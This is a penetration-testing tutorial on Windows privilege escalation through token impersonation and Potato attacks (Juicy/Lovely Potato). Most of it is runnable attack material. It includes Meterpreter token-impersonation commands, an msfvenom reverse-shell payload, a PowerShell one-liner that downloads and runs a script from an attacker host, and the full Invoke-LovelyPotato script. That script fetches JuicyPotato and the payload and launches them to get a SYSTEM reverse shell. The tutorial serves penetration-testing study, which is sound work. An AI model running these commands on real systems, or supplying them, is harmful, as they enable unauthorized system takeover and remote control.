Token Impersonation and Potato Attacks

What are Tokens?

Tokens are temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.

There are two types of tokens:

• Delegate

  • Created for logging into a machine or using Remote Desktop

  • Commmon

• Impersonate

  • "Non-interactive" such as attaching a network drive or a domain logon script

  • Less common

Enumeration

Check user privilege:

whoami /priv

If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled, then the victim machine is vulnerable to token impersonation and Potato attack. For example:

SeImpersonatePrivilege enabled

• Service accounts usually have SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege enabled.

• User accounts usually have SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege disabled.

Token Impersonation (Meterpreter)

If we get a Meterpreter session, use the following commands to get SYSTEM shell:

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
meterpreter > shell

Cheat Code: Potato Attacks

Many Windows machines are vulnerable to Potato Attacks, so I call this attack the "cheat code" in Windows privilege escalation.

For potato attacks, I recommend Lovely Potato which is an automated version of Juicy Potato. Here is the Github repo of Lovely Potato:

GitHub - TsukiCTF/Lovely-Potato: Automating juicy potato local privilege escalation exploit for penetration testers.GitHub

Lovely Potato

Setup:

cd /usr/share/windows-resources
git clone https://github.com/TsukiCTF/Lovely-Potato.git
cd Lovely-Potato

Open Invoke-LovelyPotato.ps1 in text editor and modify these two variables:

$RemoteDir = "http://<kali_ip>"
$LocalPath = "<writable_path_on_victim_machine>"

In the directory /usr/share/windows-resources/Lovely-Potato/, create a msfvenom reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=<kali_ip> LPORT=<choose_a_port> -f exe -o meterpreter.exe

Start a web server:

updog

Start a listener:

rev <the_port_you_chose>

On the Windows client, start a PowerShell and run Invoke-LovelyPotato.ps1 remotely via the DownloadString method:

powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://<kali_ip>/Invoke-LovelyPotato.ps1')"

Wait 10 minutes for reverse shell running as user NT AUTHORITY\SYSTEM.

For completeness, here is the content of the PowerShell script:

# Configuration
$RemoteDir = "http://<kali_ip>"
$LocalPath = "c:\windows\system32\spool\drivers\color"

# Download necessary files for exploitation
(New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe")

# Enumerate CLSIDs
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
$CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null}
$CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii
Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath

# Find System CLSIDs
Start-Sleep -s 600
$SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]}

# Launch Juicy Potato
$SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"}

We can do this manually as well. On Kali, make sure your current working directory has the following files:

• JuicyPotato-Static.exe

• test_clsid.bat

• meterpreter.exe

Now start a HTTP server on this directory. On Windows, transfer these three files:

(New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe")

Enumerate CLSIDs:

New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
$CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null}
$CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii
Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath

Find system CLSIDs:

Start-Sleep -s 600
$SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]}

Wait 10 minutes. Launch Juicy Potato:

$SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"}

Now we should get a SYSTEM reverse shell on Kali.